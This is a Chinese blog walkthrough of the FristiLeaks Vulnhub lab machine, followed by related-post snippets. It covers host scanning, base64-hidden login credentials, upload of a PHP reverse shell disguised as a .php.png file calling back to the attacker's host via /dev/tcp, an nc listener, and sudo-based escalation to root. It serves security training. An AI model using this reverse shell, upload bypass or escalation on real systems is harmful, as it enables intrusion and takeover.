FristiLeaks靶机渗透测试

已于 2023-12-05 17:47:14 修改
阅读量388 收藏 10
点赞数 11
文章标签: 网络安全
于 2023-12-04 21:35:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Liumx0105/article/details/134792606
版权

先对目标靶机的网段进行扫描,用nmap命令

nmap -sS 10.9.63.0/24

在这里插入图片描述
发现目标IP为10.9.63.158(每个人扫描的ip在不同网段都不一样,根据自身情况进行甄别)看看都开启了哪些端口,发现有80端口开放,打开网页输入ip进行查看
![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/7a6b712377c6446c8bcc3ec082c296dd.png

进入页面发现是一个html的网页,查看页面有哪些可以利用的元素,按F12查看元素
在这里插入图片描述
发现没有什么可以利用的信息,尝试在ip后面加一下图片后面的信息,发现fristi可以进入
在这里插入图片描述
进入到登录页面检查元素F12,发现有一串注释的代码,仔细看发现是用Base64进行编译的
在这里插入图片描述
在这里插入图片描述
解码工具对密钥进行base64解密
在这里插入图片描述
得到一个图片,上面可能是登录密码,猜的下面这个文字是用户名,尝试登录一下
在这里插入图片描述
在这里插入图片描述
发现可以登录成功,里面是一个上传文件的地方
在这里插入图片描述
在这里插入图片描述
尝试一下用上传反弹shell进入后台,编写一个php文件,ip写上自己kali的ip,后面写一个端口号

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.9.63.146/1234 0>&1'");?>

新建一个文件,lmx.php.png,把上面的代码写入,选择文件进行上传(之前实验过只能上传图片格式:jpg、png、gif等)编译器是从左往右进行编译,先编译php的
在这里插入图片描述
得到上传文件的路径
在这里插入图片描述
在ip后面输入路径加上你创建的文件夹名称进入页面,在kali里面输入nc -lvvp端口号,网站重新进入,就可以利用shell反弹进入后台

nc -lvvp 1234

在这里插入图片描述
进入之后可以输入python -c "import pty;pty.spawn(‘/bin/bash’) ",进入交互模式

python -c "import pty;pty.spawn('/bin/bash') "

在这里插入图片描述
用命令cd /home 进入家目录

cd /home

用命令ls 查看有什么用户
在这里插入图片描述
发现有admin用户,ls进入admin用户,发现有两个txt的文件,cat一下查看一下
在这里插入图片描述
发现得到了两串密钥

=RFn0AKnlMHMPIzpyuTI0ITG、mVGZ3O3omkJLmy2pcuTq

再cat一下py文件
在这里插入图片描述
发现是用这个加密方式进行加密的,用python或者是问gpt进行解密,得到两个密码

LetThereBeFristi!
thisisalsopw123

在这里插入图片描述
发现thisisalsopw123这个是admin用户的密码,LetThereBeFristi!这个是fristigod用户的密码,用su fristigod登录到这个用户,密码是LetThereBeFristi!,whoami查看一下用户

su fristigod

在这里插入图片描述
用sudo -l查看用户可以使用的sudo权限,发现有一个可以使用的

sudo -l

在这里插入图片描述
使用sudo -u指定用户,接上后面可以使用的root命令,最后加上/bin/bash进行提权

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash

在这里插入图片描述
发现已经是管理员权限了,进入根下root,发现Flag!cat一下,胜利啦!!
在这里插入图片描述

刘怼怼灬
关注
  • 11
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
靶机渗透(六)FristiLeaks
qq_42180996的博客
04-30 1296
靶机FristiLeaks 一、实验环境 二、实验步骤 (一)信息收集 1.查看测试机的IP信息,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/nmap) 4.网站指纹信息扫描(whatweb) (二)Web渗透 1.浏览web网页 2.目录扫描(dirb) 3.浏览目录 4.Keep calm and drink fristi ...
FristiLeaks_1.3
cxyzupup的博客
01-10 493
FristiLeaks_1.3 项目地址:https://www.vulnhub.com/entry/fristileaks-13,133/ 提示: (1)靶机网络连接方式使用NAT模式 (2)该靶机做了地址绑定,因此需要设置固定物理地址才能获取IP地址;物理地址为:08:00:27:A5:A6:76 文章目录FristiLeaks_1.3一、信息收集1. 使用nmap收集端口服务信息:2. 查看tcp80端口:3. 使用gobuster工具对http服务进行枚举:3.1 查看/images目录:3.2 查
靶机实战(fristileaks)
weixin_45605313的博客
06-30 198
fristileaks实验环境实验过程信息收集主机发现端口扫描服务扫描目录扫描漏洞发现漏洞利用总结 实验环境 靶机fristileaks 测试机:kali(IP:192.168.186.128),win10 实验过程 信息收集 主机发现 netdiscover -i eth0 -r 192.168.186.0/24 nmap -sn 192.168.186.0/24 arp-scan -l ,arp-scan 192.168.186.0/24 端口扫描 masscan -p 0-65535 --rat
kali渗透综合靶机(六)--FristiLeaks靶机
W小哥
03-11 1416
一、靶机下载 下载链接:https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova 二、FristiLeaks靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.27.128 靶机IP:192.1...
OSCP推荐靶场-FristiLeaks
qq_63785498的博客
10-06 413
SetUID(Set User ID)是一种特殊的权限,它允许一个程序在执行时以文件所有者的身份运行,而不是执行者的身份。这样做的效果是,命令的标准输入会与网络套接字的输出连接,从而允许远程计算机发送命令到被攻击者的计算机。: 这个选项指定了发送扫描请求的最小速率,即在扫描中发送数据包的最小速度。: 这是一个I/O重定向操作符,它将一个文件描述符(在这里是标准输出)连接到另一个文件描述符。: 这是Shell程序的名称,它会启动一个新的Shell会话。: 这是Linux系统上的一个用于查找文件和目录的命令。
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
靶机实战-FristiLeaks
滕财然的博客
01-20 429
FristiLeaks靶机实战 文章目录FristiLeaks靶机实战1、主机发现2、端口扫描3、扫描端口详细信息4、访问http服务(80端口)5、获取反弹shell6、提权 1、主机发现 netdiscover -i eth0 -r 192.168.232.0/24 双网卡,147或148都可以用 2、端口扫描 masscan --rate=100000 -p 0-65535 192.168...
靶机渗透测试实战(七)——FristiLeaks渗透实战
橘子女侠
05-11 3392
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (一)信息收集——主机发现 1. 查看Kali的IP信息;(IP:192.168.37.131) 2. 查看靶机页面,IP地址为:192.168.37.146; 3. 扫描主机(netdiscover) (二)信息收集——端口扫描 1. 扫描端口(masscan) 2. 详细扫描端口信息(nmap) (三)渗透测试 80...
靶场渗透(四)——FristiLeaks渗透
Ramona的博客
08-07 725
测试环境 靶机:firstiLeaks打开虚拟机后设为nat模式,更改mac地址为08:00:27:A5:A6:76 攻击机:kali,windows10 信息收集 • Netdiscover搜索主机位置(nmap也可以) Netdiscover –r 192.168.111.0/24 获取到靶机ip为192.168.111.137 • masscan(nmap)端口扫描 ma...
5.100个渗透测试实战#5(FristiLeaks_1.3)
qwsn
03-25 2415
目录 一、实验环境 二、实验流程 三、实验步骤 (一)信息收集——主机发现 1.查看kali的网卡和IP信息(网卡名:eth0,IP:192.168.97.129); 2.查看靶机页面; 3.探测特定网络内的主机存活状态(netdiscover、arp-scan、nmap); 4.分析所得; (二)信息收集——端口(服务)扫描; 1.扫描端口,以及端口对应的服务,以及靶机的运行...
Vulnhub-靶机-FristiLeaks 1.3
qq_43264813的博客
03-01 355
Vulnhub—靶机FristiLeaks 1.3 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 文章目录Vulnhub—靶机FristiLeaks 1.3一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址,对目标靶机进行全端口扫描: 【命令】nmap -n -p- 192.168
Vulnhub靶机FristiLeaks_1.3
最新发布
qq_48904485的博客
03-19 947
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机FristiLeaks 1.3(10.0.2.12)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/fristileaks-13,133/注意安装靶机的时候需要将靶机的MAC地址改为:08:00:27:A5:A6:76,否则靶机ip地址会获取不到。
Vulnhub靶机渗透FRISTILEAKS: 1.3
Mysmycbx的博客
05-27 2019
信息收集很难,需要总结
【甄选靶场】Vulnhub百个项目渗透——项目十六:FristiLeaks_1.3(文件上传,py脚本改写,sudo提权,脏牛提权,源码获取)
人间体佐菲的博客
09-18 707
网络安全,基础,靶场,信息安全,渗透测试,红队
【vulnhub】---FristiLeaks_1.3靶机
qq_43168364的博客
08-22 848
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机FristiLeaks: 1.3靶机(192.168.15.155) 攻击机:kali Linux(192.168.15.129) 相关设置 根据官网的提示这里需要给靶机设置MAC地址 设置好了之后就可以开心的玩耍了。 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:arp-scan -l 命令:netdiscover -i eth0 -r
Zico2靶机渗透测试实战指南
"该文档是关于使用Zico2作为靶机进行渗透测试的实战指南,主要涵盖实验环境的设置、信息收集以及渗透测试的步骤。Zico2是一个用于安全研究和教育的虚拟机,适用于练习渗透测试技术。" 在渗透测试领域,Zico2靶机...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值